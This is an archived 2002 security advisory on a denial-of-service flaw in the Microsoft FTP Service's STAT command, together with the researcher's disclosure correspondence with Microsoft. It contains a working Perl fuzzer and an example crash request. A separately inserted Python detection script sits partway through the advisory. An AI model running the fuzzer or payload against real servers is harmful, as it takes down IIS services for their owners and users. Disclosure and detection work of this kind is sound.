Microsoft FTP Service STAT Globbing DoS

From: H D Moore (sflistat_private)
Date: Tue Apr 16 2002 - 18:33:36 PDT


    A copy of this document can be found online at:
    	http://www.digitaloffense.net/msftpd/advisory.txt
    -----------------------------------------------------------------------------------------------
    
    --[ Microsoft FTP Service STAT Globbing DoS
    
    Summary:
    
    	The Microsoft FTP service is vulnerable to a Denial of Service
    	attack in the STAT command. This DoS can be triggered by a remote
    	attacker using either a valid user account or the anonymous account,
    	which is enabled by default. Once exploited, all services running
    	under the inetinfo.exe process will terminate. On IIS 5.0 and above,
    	these services are supposed to restart; on IIS 4.0 the services must
    	be restarted manually. This vulnerability appears to be impossible to
    	exploit to gain a remote command shell. Versions other than 4.0 and
    	5.0 were not tested. Microsoft's advisory and a link to a patch are
    	available online at:
    
    	http://www.microsoft.com/technet/security/bulletin/MS02-018.asp
    
    Details:
    
    	This vulnerability was discovered in November 2001 by a "fuzzer"
    	script I wrote to audit FTP daemons for problems in the globbing
    	functionality. This script created and sent random arguments to the
    	"STAT" command consisting of various combinations of globbing
    	characters. The original fuzzer had to be modified to use the Windows
    	glob characters instead of the normal Unix set. Within 20 seconds the
    	script had caused an access violation on a fully patched IIS server.
    
    	An example request which can cause the crash:
    
    	STAT ?*<240 x X>
    
    	The crash occurs when a memchr call is passed a pointer which
    	dereferences to a NULL. It may be possible to overwrite this memory
    	with an arbitrary path and use this exploit to obtain a directory
    	listing, but all attempts so far have failed and constantly
    	restarting IIS and retrying was getting old.
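The following detector is an added example and is not part of the advisory or of the Digital Offense scripts. It shows how a defender could flag the STAT request shape described above (Windows glob characters followed by a long run of padding) on a captured FTP control channel, and whether the session behind it used the anonymous account that the advisory notes is enabled by default. The input format (a list of client-address/command-line pairs from a passive sensor or proxy), the sample commands, and the length thresholds are all assumptions chosen from the advisory's own numbers (240 x X; 45 glob characters plus 200 A's).

```python
"""Flag FTP STAT commands that match the MS FTP globbing-crash shape.

Added example, not the advisory's own code. Thresholds and the
(client_ip, command_line) input format are assumptions.
"""
import re
from collections import defaultdict

GLOB_CHARS = set("?*")         # Windows glob metacharacters used by the fuzzer
MAX_SANE_STAT_ARG = 64         # assumption: real path arguments are far shorter
MIN_GLOB_COUNT = 8             # assumption: a legitimate pattern has a few at most
PADDING_RUN = re.compile(r"(.)\1{31,}")   # 32+ repeats of one byte (e.g. "X" * 240)


def parse_command(line):
    """Split one FTP control-channel line into (VERB, argument)."""
    line = line.rstrip("\r\n")
    verb, _, arg = line.partition(" ")
    return verb.upper(), arg


def classify_stat_arg(arg):
    """Return the reasons a STAT argument resembles the globbing DoS (empty if none)."""
    reasons = []
    has_glob = any(c in GLOB_CHARS for c in arg)
    if has_glob and len(arg) > MAX_SANE_STAT_ARG:
        reasons.append("glob chars with oversized argument (%d bytes)" % len(arg))
    if PADDING_RUN.search(arg):
        reasons.append("long run of a single repeated byte")
    glob_count = sum(1 for c in arg if c in GLOB_CHARS)
    if glob_count >= MIN_GLOB_COUNT:
        reasons.append("%d glob metacharacters" % glob_count)
    return reasons


def analyze_commands(commands):
    """commands: iterable of (client_ip, raw_line) in arrival order.

    Tracks which clients logged in as anonymous and returns one alert dict
    per suspicious STAT command.
    """
    anonymous = defaultdict(bool)
    alerts = []
    for ip, raw in commands:
        verb, arg = parse_command(raw)
        if verb == "USER" and arg.strip().lower() in ("anonymous", "ftp"):
            anonymous[ip] = True
        elif verb == "STAT":
            reasons = classify_stat_arg(arg)
            if reasons:
                alerts.append({"client": ip, "anonymous": anonymous[ip],
                               "arg_len": len(arg), "reasons": reasons})
    return alerts


# Constructed sample traffic: two clients, one anonymous, one authenticated.
SAMPLE_COMMANDS = [
    ("10.0.0.5", "USER anonymous"),
    ("10.0.0.5", "PASS crash@burn.com"),
    ("10.0.0.5", "CWD /pub"),
    ("10.0.0.5", "STAT *.txt"),                        # benign glob, short
    ("10.0.0.5", "STAT ?*" + "X" * 240),               # advisory's example request
    ("10.0.0.9", "USER alice"),
    ("10.0.0.9", "STAT " + "?.\\*" * 11 + "A" * 200),  # fuzzer-style argument
    ("10.0.0.9", "STAT /pub/readme.txt"),              # benign, no glob
]

if __name__ == "__main__":
    for alert in analyze_commands(SAMPLE_COMMANDS):
        print("%(client)s anonymous=%(anonymous)s len=%(arg_len)d: %(reasons)s" % alert)
```

The three checks are deliberately independent: the oversized-argument rule catches the exact request in the advisory, the repeated-byte rule catches the padding the fuzzer appends regardless of which glob characters precede it, and the glob-count rule catches the random 45-character prefix even if a future variant used shorter padding. A single short `*.txt` pattern trips none of them, which keeps ordinary directory listings out of the alert stream.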
    
    
    Scripts:
    
    	(DoS PoC)
    	http://www.digitaloffense.net/msftpd/msftp_dos.pl
    
    	(Original "Fuzzer")
    	http://www.digitaloffense.net/msftpd/msftp_fuzz.pl
    
    
    Credits:
    
    	The following people helped in one form or another:
    
    	* bind
    	* rkl
    	* halvar
    	* tsnoop
    	* ah / da (vulnhelp)
    
    History:
    
    	Microsoft was notified of this vulnerability on December 2nd, 2001
    	through the SecurityFocus VulnHelp service. This vulnerability was
    	made "public" in early February at the SANS Network Security
    	Bootcamp conference in Monterey, CA. Complete details about this
    	vulnerability as well as an example Perl script have been available
    	from the Digital Offense web site since then. This was due to a
    	miscommunication about the availability of a patch between myself and
    	the Microsoft Security team. This confusion came about because
    	another reported vulnerability had been silently fixed as part of the
    	SP2 Security Rollup 1 Update and this vulnerability was assumed to
    	have been fixed as well. When I asked MS about this later, they
    	responded saying that they would announce the other vulnerability (MS
    	SMTP BDAT DoS) during the _NEXT_ security update and the fix for this
    	one was being held back until the IIS developers released a jumbo
    	patch for all currently reported problems. Considering that they were
    	told 3 months previous that people were actively developing exploits
    	for this issue and now a few hundred people had been informed about
    	it at the conference, I found their unwillingness to release a hotfix
    	absurd. The entire email exchange is listed below.
    
    --[ Email History
    
    [ The Original VulnHelp Email ]
    
    Microsoft FTP Daemon STAT Globbing Bug
    Date: Sun, 2 Dec 2001 20:04:28  -0600
    From: H D Moore <hdmat_private>
    To: vulnhelpat_private
    The Microsoft FTP Service (5.0) crashes when a certain combination of
    glob strings is passed to the STAT command. I was unable to control
    the address of the crash, but since there are ample methods of placing
    user data into memory, I'm sure someone will be able to exploit it
    given enough time. The perl code below should be sufficient to
    demonstrate the problem.
    
    As for a deadline on releasing a patch or making a public
    announcement, the sooner the better; there are already a few people
    developing exploits for it.
    
    ---------------------------------------------------------------------
    
    
    #!/usr/bin/perl -w
    ##################
    
    # cheezy perl to fuzz ftp globs
    # this one is designed for msftpd and STAT
    
    use Net::FTP;
    srand(time() + int($$));
    
    $target = shift() || "127.0.0.1";
    my $user = "anonymous";
    my $pass = "crash\@burn.com";
    
    $ftp = Net::FTP->new($target, Debug => 0, Port => 21) || 
    die "could not connect: $!";
    $ftp->login($user, $pass) || die "could not login: $!";
    $ftp->cwd("/pub");
    
    # crash it
    while (1)
    {
        $g = GetGlob();
        print STDERR "Trying: $g\n";
        $ret = $ftp->quot("STAT $g");
        if ($ret !~ /^2/)
        {
            print "Error: FTP server returned an error response.\n";
            exit(1);
        }
    }
    
    $ftp->quit;
    
    sub GetGlob {
        my $result;
    
        $len = 45;
        @globs = split(//, "?.\\*");
    
        # build a string consisting of random sequences
        # of the glob character array
        for (1 .. $len)
        {
            $result .= $globs[int(rand() * scalar(@globs))];
        }
    
        # this provides some padding which is required
        # for the daemon to crash. my guess is that an
        # internal file name buffer is being overflowed
        # when a glob result string and a large char string
        # are combined, the length isn't checked.
        $result .= "A" x 200;
    
        return $result;
    }
    
    __END__
    
    Only tested on Windows 2000 / MSFTPD 5.0 / Full Patches/ SP2:
    
    Event Type:     Information
    Event Source:   Application Popup
    Event Category: None
    Event ID:       26
    Date:           12/2/2001
    Time:           3:37:27 PM
    User:           N/A
    Computer:       SHATTERED
    Description:
    Application popup: inetinfo.exe - Application Error : The instruction
    at "0x6fc6a35c" referenced memory at "0x00000000". The memory could
    not be "written".
    
    Click on OK to terminate the program
    Click on CANCEL to debug the program
    
    
    
    
    [ The Initial Microsoft Response ]
    
    RE: [MSRC 961lt] Notification of Security Vulnerability
    Date: Mon, 3 Dec 2001 17:45:14 -0800
    From: "Microsoft Security Response Center" <secureat_private>
    To: "Vulnerability Help" <vulnhelpat_private>
    Cc: <hdmooreat_private>, "Microsoft Security Response Center"
    <secureat_private>
    Hi -
    
    Thanks very much for your note.  I'll start an investigation of this
    issue immediately, and will let you know what I find out.  In the
    meantime, I've assigned tracking number MSRC 961 to this issue.  If
    you would keep it in the subject line of future notes on the subject,
    it would make it easier to get status information for you.
    
    Regards
    
    Secureat_private
    
    
    
    [ The Confirmation from Microsoft ]
    
    RE: [MSRC 961lt] Notification of Security Vulnerability
    Date: Tue, 8 Jan 2002 08:55:38 -0800
    From: "Microsoft Security Response Center" <secureat_private>
    To: <hdmooreat_private>
    Cc: "Microsoft Security Response Center" <secureat_private>
    Hi,
    
    I just wanted to update you and let you know that we have successfully
    reproduced this issue and plan on fixing it in the next rollup patch
    for IIS.  We really appreciate you bringing this problem to our
    attention and will update you on the timetable for release.  I am not
    sure yet where we are with the next IIS rollup but as soon as I learn
    I will update you again.
    
    Thanks for your email and for working with us.
    
    Kind regards,
    
    secureat_private
    
    
    
    [ My Response ]
    
    Re: [MSRC 961lt] Notification of Security Vulnerability
    Date: Tue, 15 Jan 2002 11:50:28 -0600
    From: H D Moore <hdmat_private>
    To: "Microsoft Security Response Center" <secureat_private>,
    <hdmooreat_private>
    Cc: "Microsoft Security Response Center" <secureat_private>
    
    Will this patch also fix the SMTP BDAT crash reported a month
    previously?
    
    
    
    [ Their Response ]
    
    RE: [MSRC 961lt] Notification of Security Vulnerability
    Date: Tue, 15 Jan 2002 12:45:55 -0800
    From: "Microsoft Security Response Center" <secureat_private>
    To: "H D Moore" <hdmat_private>
    Cc: "Microsoft Security Response Center" <secureat_private>
    Hi,
    
    Thanks for your note.  The SMTP BDAT issue is separate and will be
    addressed in another patch.
    
    Regards,
    
    secureat_private
    
    
    
    [ My Response ]
    
    
    Re: [MSRC 961lt] Notification of Security Vulnerability
    Date: Fri, 15 Feb 2002 01:48:44 -0600
    From: H D Moore <hdmat_private>
    To: "Microsoft Security Response Center" <secureat_private>
    Do you have an ETA on when the FTP issue will be fixed? The reason I
    ask is that I (mistakenly) assumed that the SP2SR1 patch already
    solved this problem and included the vulnerability in a presentation
    at a recent SANS conference.
    
    The reason for the confusion was simple: the SP2SR1 patch mentioned
    many fixes related to IIS services, and a quick glance showed that it
    addressed an issue with pattern-matching in the FTP service. Based on
    your previous message, I assumed this was the correct patch for it and
    let the cat out of the bag.
    
    The SP2SR1 patch did fix the SMTP BDAT bug, which I did verify before
    presenting the information. The materials are online, including a
    script to verify the existence of the vulnerability. I have no problem
    pulling the script off the site for the interim, but the attendees at
    the conference already have copies of the slides which contain enough
    information to exploit the bug...
    
    URL for the conference materials:
    http://www.digitaloffense.net/confs/bootcamp02/
    
    Direct link to the slide addressing this bug:
    http://www.digitaloffense.net/confs/bootcamp02/jpeg/smash/Slide67.html
    
    
    On Tuesday 15 January 2002 02:45 pm, Microsoft Security Response
    Center wrote:
    > Hi,
    >
    > Thanks for your note.  The SMTP BDAT issue is separate and will be
    > addressed in another patch.
    >
    > Regards,
    >
    > secureat_private
    >
    > -----Original Message-----
    > From: H D Moore [mailto:hdmat_private]
    > Sent: Tuesday, January 15, 2002 9:50 AM
    > To: Microsoft Security Response Center; hdmooreat_private
    > Cc: Microsoft Security Response Center
    > Subject: Re: [MSRC 961lt] Notification of Security Vulnerability
    >
    >
    > On Tuesday 08 January 2002 10:55 am, Microsoft Security
    > Response Center wrote:
    > > Hi,
    > >
    > > I just wanted to update you and let you know that we have
    > > successfully reproduced this issue and plan on fixing it in the
    > > next rollup patch for IIS.  We really appreciate you bringing this
    > > problem to our attention and will update you on the timetable for
    > > release.  I am not sure yet where we are with the next IIS rollup
    > > but as soon as I learn I will update you again.
    > >
    > > Thanks for your email and for working with us.
    > >
    > > Kind regards,
    > >
    > > secureat_private
    >
    > Will this patch also fix the SMTP BDAT crash reported a month
    > previously?
    
    
    [ Their Response ]
    
    RE: [MSRC 961lt] Notification of Security Vulnerability
    Date: Mon, 18 Feb 2002 12:10:40 -0800
    From: "Microsoft Security Response Center" <secureat_private>
    To: "H D Moore" <hdmat_private>
    Cc: "Microsoft Security Response Center" <secureat_private>
    Hi,
    
    I appreciate your note and your candor.  I've forwarded this to the
    IIS folks to see if we can seriously speed up the rollup or if we need
    to work on an individual hotfix for your FTP issue MSRC 961.
    
    In regards to the BDAT issue, we replied to them on Nov 18.  I enclose
    the correspondence for your review.  Please let me know if there is
    some misunderstanding because we received the report from them and
    responded back to them.  I was under the impression that they would
    handle getting the response back to you.  In the second email, they
    note that they received our mail.  Please let me know if we are
    missing something on our end.  I am concerned about this.
    
    Regards,
    
    secureat_private
    
    -----Original Message-----
    From: H D Moore [mailto:hdmat_private]
    Sent: Monday, February 18, 2002 2:28 AM
    To: Microsoft Security Response Center
    Cc: Microsoft Security Response Center
    Subject: Re: [MSRC 961lt] Notification of Security Vulnerability
    
    
    On Friday 15 February 2002 10:28 am, Microsoft Security Response
    Center wrote:
    > Hi,
    >
    > The FTP issue is due to come out in an IIS rollup patch.  We are
    > pushing the priority of this patch because we feel there are issues
    > that merit one sooner rather than later.  I would look for it in the
    > coming month - even though I cannot guarantee it I feel fairly firm
    > on this.  The IIS devs are really working with us and understand the
    > reasons we are pushing.
    
    The initial email I sent through vuln-help (early December) stated the
    vulnerability had become known to a handful of people, and that those
    people were actively developing exploits for it. The bug was
    determined to be non-exploitable (in a remote command shell granting
    way), but the DoS aspect is trivial to reproduce. It has been two
    months now and I am positive that there are people actually taking
    advantage of this in the wild.
    
    > In regards to presenting this issue at a conference, it seems to
    > me to be an honest mistake.  Unless you feel that this
    > vulnerability is being exploited in the wild, I would still like
    > the IIS rollup to be the ship vehicle.  Please let me know your
    > thoughts - I am sincerely interested.
    
    I am already getting a flood of email about details of this
    vulnerability and the availability of patches. So far, I have been
    recommending to just disable anonymous access and sit it out a month,
    but a hard release date would be preferable.
    
    I would feel much better about the whole situation if it wasn't for
    the way the SMTP BDAT bug was handled. A notification was sent
    through vuln-help on November 13th, 2001, yet I received no response
    on it until January 15th, 2002. To make matters worse, the SP2SR1
    silently fixed this bug, with no mention of it in the online
    documentation, and no notification was ever sent to me stating that
    this patch addressed the bug. This bug will become public knowledge
    today.
    
    > Thanks for the update.  Let me know if there is anything else we can
    > do.
    
    When will the IIS rollup patch be available? If there will be more
    than a week's delay, would it be possible to release a hotfix for it
    instead?
    



    This archive was generated by hypermail 2b30 : Tue Apr 16 2002 - 20:08:32 PDT